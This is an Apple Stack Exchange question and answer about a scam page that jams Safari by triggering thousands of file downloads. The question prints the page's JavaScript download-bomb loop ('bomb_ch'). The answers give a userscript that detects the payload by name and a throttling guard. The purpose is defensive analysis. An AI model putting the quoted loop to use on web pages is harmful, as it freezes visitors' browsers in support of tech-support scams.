MacOS – Prevent Spam Downloads on Safari

Tags: data transfer, macos, malware, safari

Background

A new spam page has started to appear throughout many "questionable" sites (movie sites, etc.). This new spam page fits into the category of fake scans, MacKeeper, "YOU HAVE A VIRUS", etc.

Problem

The problem with this new page is that instead of just having a popup, the page actually initiates a download of random 2kb files (not harmful, they just contain random text) repeatedly every ~1ms. The download folder fills up before you can close the window and you are left deleting 1000+ files. Unlike a similar problem in which a page spam brings up the print dialog, there is very little time to react.

Failed Troubleshooting Attempts

  • I tried locking the download folder. While it prevented the downloads from…well…downloading, a dialog box (see image) comes up. Usually, I could just dismiss this dialog box, but since the download is attempted every ~1ms, a new dialog pops up every time I try to dismiss it, preventing me from closing the window.

  • Force quitting Safari, which stops the download (after 1k's of downloads), but then I lose all my other windows.

  • Changing settings to ‘Ask for each download’ in Safari preferences. Doesn't work because 1k's of separate dialog boxes open, preventing me from even closing the tab and eventually crashing Safari.


Question

How can I prevent spam downloads in Safari?

UPDATE:

Here's the code causing the download (got it by disabling JavaScript and looking through the code manually):

    function download(g, h, j) {
        var k = new Blob([g], {
            type: j
        });
        if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
        else {
            var l = document.createElement("a"),
                m = URL.createObjectURL(k);
            l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
        }
    }
    function bomb_ch() {
        var g = Math.random().toString(36).substring(20),
            h = Math.floor(50 * Math.random() + 25);
        while (true) download(h, g, g)
    }
    function ch_jam() {
        bomb_ch()
    }

Note: I had some issues running the JS on a custom page. It froze instead of downloading. I was able to emulate the download by using a setInterval() function calling the download function.

More info: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

Best Answer

Wouldn't this be a good case for a Safari content blocker / javascript blocker that's selective?

Ghostery might be a good place to start on the Mac to see if you can use pre-built rules to quash cross-site scripting / ad injection of code into web pages. Of course, if the page is serving up that content directly you'll need to disable javascript on that page entirely or take note and just block those sites that crap up your experience intentionally or due to selling off ad injection to anyone with the means to afford this scare ware and scam ware.

If you wanted to be more precise - GreaseMonkey type user scripts could combat this with enough JS knowledge on your part (or finding someone that wrote the script to block today's iteration of this malware).

Edited By @JBis

The following userscript was successful in blocking the page.

    // ==UserScript==
    // @name         The Bomb Squad
    // @version      0.1
    // @description  Blocks the pages containing any function with the bomb_ch function detailed in https://apple.stackexchange.com/questions/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
    // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
    // @match        *
    // @grant        none
    // ==/UserScript==

    // Replace the page body if the page defines a global bomb_ch function.
    if (typeof bomb_ch === "function") {
        document.getElementsByTagName("body")[0].innerHTML = "<h1>Page Defused by The Bomb Squad</h1><p>Because it contained the following function(s): <pre>bomb_ch()</pre> <br>";
    }

Note: Sp(c)ammers can easily bypass this by randomizing the bomb_ch() function.

Newer OS versions of Safari might help cut this down a bit, but there's money to be made by people that deliver this load of crap to your Mac so they'll likely adapt to any technologies that try to make it easy to block. Unless you're willing to spend more money supporting a business that maintains a library of settings that can "whack-a-mole" and adapt faster than the charlatans can cook up new code in their boiler room.

You'll also have to decide if the web sites that do this are also charlatans that are part of the con since they should know this is happening to you, one of the visitors they host.
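The userscript in the answer matches on the function name, which its own note says is easy to change. As an added example (not part of the original answer or the userscript author's code), the guard below throttles the behaviour instead: script-triggered `click()` calls on `download` or `blob:` links. The `installDownloadGuard` name, the default of 3 downloads per 10 seconds, and loading it with `@run-at document-start` are assumptions of this example.

```javascript
// Added example: rate-limit script-driven download clicks, whatever the
// page's functions are called. As a userscript it is assumed to load with
// "@run-at document-start" so the wrapper exists before the page script runs.

function installDownloadGuard(anchorProto, options = {}) {
  const limit = options.limit ?? 3;            // downloads allowed per window (assumed default)
  const windowMs = options.windowMs ?? 10000;  // sliding window in ms (assumed default)
  const now = options.now ?? Date.now;         // injectable clock, used for testing
  const originalClick = anchorProto.click;     // inherited HTMLElement click in a browser
  const recent = [];                           // timestamps of allowed download clicks
  const stats = { allowed: 0, blocked: 0 };

  anchorProto.click = function guardedClick() {
    // Only <a download> and blob: links are throttled; ordinary links pass through.
    const isDownload = this.hasAttribute("download") ||
      String(this.href || "").startsWith("blob:");
    if (!isDownload) return originalClick.apply(this, arguments);

    const t = now();
    // Drop timestamps that have aged out of the sliding window.
    while (recent.length && t - recent[0] >= windowMs) recent.shift();
    if (recent.length >= limit) {
      stats.blocked += 1;                      // swallow the click: nothing is saved
      return undefined;
    }
    recent.push(t);
    stats.allowed += 1;
    return originalClick.apply(this, arguments);
  };
  return stats;                                // live counters for logging or a banner
}

// In a browser, guard every anchor element; outside a browser this is skipped.
if (typeof HTMLAnchorElement !== "undefined") {
  installDownloadGuard(HTMLAnchorElement.prototype);
}
```

The guard covers the `click()` call path used by the code in the question; the returned counters can drive a "page defused" banner like the one in the answer once `blocked` is non-zero.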